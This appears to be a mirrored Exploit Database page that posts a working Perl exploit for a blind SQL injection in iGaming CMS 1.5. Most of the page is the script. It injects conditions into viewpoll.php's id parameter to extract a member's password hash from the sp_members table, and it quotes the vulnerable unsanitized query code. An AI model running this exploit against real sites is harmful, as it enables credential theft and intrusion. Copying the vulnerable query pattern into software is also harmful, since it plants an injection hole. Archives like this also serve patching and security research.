iGaming CMS 1.5 – Blind SQL Injection

• Exploit Database
• 40 阅读

• 作者： plucky
  日期： 2010-10-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15177/

• #!/usr/bin/env perl
  
  =pod
  iGaming CMS <= 1.5 Blind SQL Injection
  
  Author: plucky
  Email: io.plucky@gmail.com
  Web Site: http://plucky.heliohost.org
  Crew : WarWolfZ
  
  Usage: perl exploit.pl <website> <user_id>
  Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1
  
  Vulnerability: polls.class.php
  [line 10-17]
  
  if (!empty($_REQUEST['id']))
  {
  $poll = $db->Execute("
  SELECT id,title
  FROM `sp_polls`
  WHERE `id` = '" . $_REQUEST['id'] . "'");
  
  $result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id"); 
  
  THX TO: shrod and warwolfz crew
  =cut
  
  use strict;
  use warnings;
  use LWP::Simple;
  
  my $password = '';
  my $vulnerable_page= '';
  
  my $target_id=1;
  
  sub header_exploit {
   
   print 'iGaming CMS <= 1.5 Blind SQL Injection'. "\n".
   '-----------------------------------------' . "\n".
   'Author:plucky' . "\n".
   'Email: io.plucky@gmail.com'. "\n".
   '-----------------------------------------' . "\n".
   '[!]Target id: '.$target_id . "\n".
   '[!]Exploit Status: Working...' . "\n";
  }
  
  sub usage_exploit {
  
   print 'Usage:'. "\n".
   'perl exploit.pl http://[site]/[path]/ [id]'. "\n".
   'Examples:' . "\n".
   ' perl' . $0 . 'http://web_site/cms/ 1' . "\n".
   ' perl' . $0 . 'http://games_site/iGamingCMS1.5/ 1' . "\n";
  
  exit;
  }
  
  sub run_exploit {
   
   my $parameter_id = shift;
   my $parameter_page = shift;
  
   my $target_id= $$parameter_id;
   my $vulnerable_page= $$parameter_page;
  
   my $character_id =1;
  
   my $HTML_source= '';
   my $SQL_Injection= '';
   my $hexadecimal_character= '';
   my $result = '';
   my $table= 'sp_members';
  
   my @hexadecimal_characters = ( 48..57, 97..102 );
  
  
   foreach $character_id ( 1..32 ) {
   
   character_research:
  foreach $hexadecimal_character ( @hexadecimal_characters ) {
  
   $SQL_Injection= "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23"; 
   $HTML_source = get( $vulnerable_page.$SQL_Injection );
  
   if ( $HTML_source !~ /Error/i ) {
  
   $result .= chr($hexadecimal_character);
   $character_id++;
  
   last character_research;
   }
   }
   }
   
   return $result;
  }
  
  $vulnerable_page = $ARGV[0] || usage_exploit;
  $target_id = $ARGV[1] || usage_exploit;
  
  header_exploit;
  $password = run_exploit ( \$target_id, \$vulnerable_page );
  
  print '[!]Password: ', $password, "\n";